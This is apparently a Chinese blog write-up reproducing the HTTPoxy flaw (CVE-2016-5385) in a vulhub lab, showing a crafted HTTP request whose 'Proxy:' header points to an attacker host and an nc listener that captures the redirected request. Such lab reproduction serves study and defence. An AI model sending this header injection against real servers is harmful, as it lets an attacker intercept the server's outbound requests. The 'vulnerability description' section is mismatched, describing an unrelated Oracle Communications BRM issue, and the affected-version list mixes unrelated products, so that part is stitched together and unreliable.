PHP HTTPoxy CGI 应用程序漏洞 CVE-2016-5385

HTTPoxy CGI 应用程序漏洞 CVE-2016-5385 已亲自复现

漏洞名称

漏洞描述

在Oracle Communications BRM 10.x/12.x(云软件)中发现漏洞。它已经被宣布为关键。此漏洞影响组件用户数据库的未知功能。升级可消除此漏洞。在泄露漏洞后立即发布了可能的缓解措施。可以使用Snort ID 39737来识别攻击企图。

影响版本

Redhat Enterprise_Linux_Server 6.0

Oracle Communications_User_Data_Repository 12.0.0

Oracle Enterprise_Manager_Ops_Center 12.3.2

Oracle Communications_User_Data_Repository 10.0.0

8.0.0 <= Drupal < 8.1.7

漏洞复现

环境搭建

受害者IP:192.168.63.129:8080

攻击者IP:192.168.63.1

vulhub下载链接

bash 复制代码
https://github.com/vulhub/vulhub
git clone https://github.com/vulhub/vulhub.git

启动vulfocus

bash 复制代码
docker-compose up -d 

环境启动后,访问http://192.168.63.129:8080即可看到一个nginx页面,说明已成功启动。

漏洞利用

正常请求http://192.168.63.129:8080/index.php,可见其Origin为当前请求的服务器,这里用的自己搭建的环境,因此返回公网的IP地址。正常情况下与请求头中的host一致。

在请求头中加入proxy代理,这里的Proxy: http://192.168.63.1:1234/不是 HTTP 代理,在主机192.168.63.1中不存在该http服务。因此在响应体中返回报错信息。

bash 复制代码
GET /index.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Proxy: http://192.168.63.1:1234/

在192.168.63.1主机上监听端口,我们可以捕获原始请求。

bash 复制代码
nc -lvnp 1234

在vulhub的官网中,响应体返回了正常的请求内容,在Origin返回当前请求的服务器,与上面返回错误不同的是,这里使用的是可以访问的HTTP代理,存在http服务。

修复建议

1、补丁链接:https://www.php.net/downloads 5.6.24修复了该漏洞

相关推荐
玉笥寻珍2 小时前
Web安全渗测试基础知识之SSL交互异常利用篇
网络协议·安全·web安全·网络安全·交互·ssl
不会代码的小徐2 小时前
容器安全-核心概述
安全·网络安全·云计算
筱宇***6 小时前
Mac的web服务器
mysql·nginx·macos·php
iangyu11 小时前
【windows server脚本每天从网络盘复制到本地】
开发语言·windows·php
YUJIANYUE12 小时前
PHP黑白胶卷底片图转彩图功能 V2025.05.15
php
玉笥寻珍12 小时前
web安全渗透测试基础知识之登录绕过篇
python·安全·web安全·网络安全·威胁分析
为自己_带盐12 小时前
浅聊一下数据库的索引优化
开发语言·数据库·php
独行soc13 小时前
2025年渗透测试面试题总结-渗透测试红队面试九(题目+回答)
linux·安全·web安全·网络安全·面试·职场和发展·渗透测试
chilavert31814 小时前
关于Python 实现接口安全防护:限流、熔断降级与认证授权的深度实践
python·网络安全
上海云盾第一敬业销售14 小时前
高防ip支持哪些网络协议
网络安全